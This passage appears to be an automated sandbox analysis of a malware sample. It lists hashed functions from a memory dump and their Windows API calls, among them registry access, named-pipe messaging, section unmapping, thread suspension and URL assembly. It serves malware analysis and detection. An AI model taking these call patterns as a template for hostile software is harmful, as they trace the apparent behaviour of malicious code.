  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
